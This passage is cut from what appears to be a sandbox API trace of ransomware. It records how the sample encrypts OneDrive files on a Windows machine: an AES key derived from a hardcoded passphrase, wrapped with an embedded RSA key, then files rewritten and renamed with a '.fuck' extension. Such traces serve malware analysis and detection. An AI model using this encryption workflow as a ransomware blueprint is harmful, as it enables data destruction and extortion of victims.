dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.203] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.203] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.203] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.203] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.204] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.204] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.204] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.204] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.204] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.204] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0xd7, lpOverlapped=0x0) returned 1 [0274.204] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xd7, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xe0) returned 1 [0274.204] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0xe0, lpOverlapped=0x0) returned 1 [0274.204] CloseHandle (hObject=0x5d4c) returned 1 [0274.204] CloseHandle (hObject=0x5d48) returned 1 [0274.204] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappblue.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappblue.png"), bFailIfExists=0) returned 1 [0274.208] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png", dwFileAttributes=0x0) returned 1 [0274.208] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappblue.png.gsg")) returned 1 [0274.210] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappblue.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappblue.png.fuck")) returned 1 [0274.211] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0274.211] CryptDestroyKey (hKey=0x2fa748) returned 1 [0274.211] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0274.211] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.211] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0274.211] GetLastError () returned 0x0 [0274.211] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappwhite.png")) returned 0x20 [0274.212] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png", dwFileAttributes=0x80) returned 1 [0274.212] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappwhite.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.213] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappwhite.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.214] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png.gsg", dwFileAttributes=0x2) returned 1 [0274.214] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0274.217] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0274.217] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.217] CryptHashData (hHash=0x2fa748, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.217] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa4c8) returned 1 [0274.217] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.217] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0274.217] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f2a7c8) returned 1 [0274.218] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2a7c8, dwCertEncodingType=0x1, pInfo=0x2f34580*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f345b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f345b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2faa88) returned 1 [0274.218] CryptEncrypt (in: hKey=0x2faa88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0274.218] CryptEncrypt (in: hKey=0x2faa88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a5a8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a5a8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0274.218] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f2a5a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f2a5a8*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0274.219] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.227] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.228] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.230] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.230] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.230] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.230] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.230] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.230] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.230] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.230] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.230] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.230] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.231] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.231] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.231] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x24c, lpOverlapped=0x0) returned 1 [0274.231] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x24c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x250) returned 1 [0274.231] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x250, lpOverlapped=0x0) returned 1 [0274.231] CloseHandle (hObject=0x5d48) returned 1 [0274.231] CloseHandle (hObject=0x5d4c) returned 1 [0274.231] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappwhite.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappwhite.png"), bFailIfExists=0) returned 1 [0274.234] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png", dwFileAttributes=0x0) returned 1 [0274.235] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappwhite.png.gsg")) returned 1 [0274.236] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappwhite.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppWhite.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappwhite.png.fuck")) returned 1 [0274.238] CryptDestroyHash (hHash=0x2fa748) returned 1 [0274.238] CryptDestroyKey (hKey=0x2fa4c8) returned 1 [0274.238] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0274.238] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.238] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0274.238] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.238] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.238] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0274.239] GetLastError () returned 0x0 [0274.239] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\filesync.localizedresources.dll.mui")) returned 0x20 [0274.240] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0274.240] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.241] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0274.242] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0274.242] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a6b8) returned 1 [0274.244] CryptCreateHash (in: hProv=0x2f2a6b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0274.244] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.244] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.244] CryptDeriveKey (in: hProv=0x2f2a6b8, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2faac8) returned 1 [0274.245] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.245] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0274.245] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2a520) returned 1 [0274.245] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2a520, dwCertEncodingType=0x1, pInfo=0x2f33950*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33980*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33988*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb348) returned 1 [0274.245] CryptEncrypt (in: hKey=0x2fb348, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0274.245] CryptEncrypt (in: hKey=0x2fb348, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a630*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a630*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0274.245] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2a630*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2a630*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0274.246] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.263] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.264] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.279] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.279] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.279] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.280] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.280] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 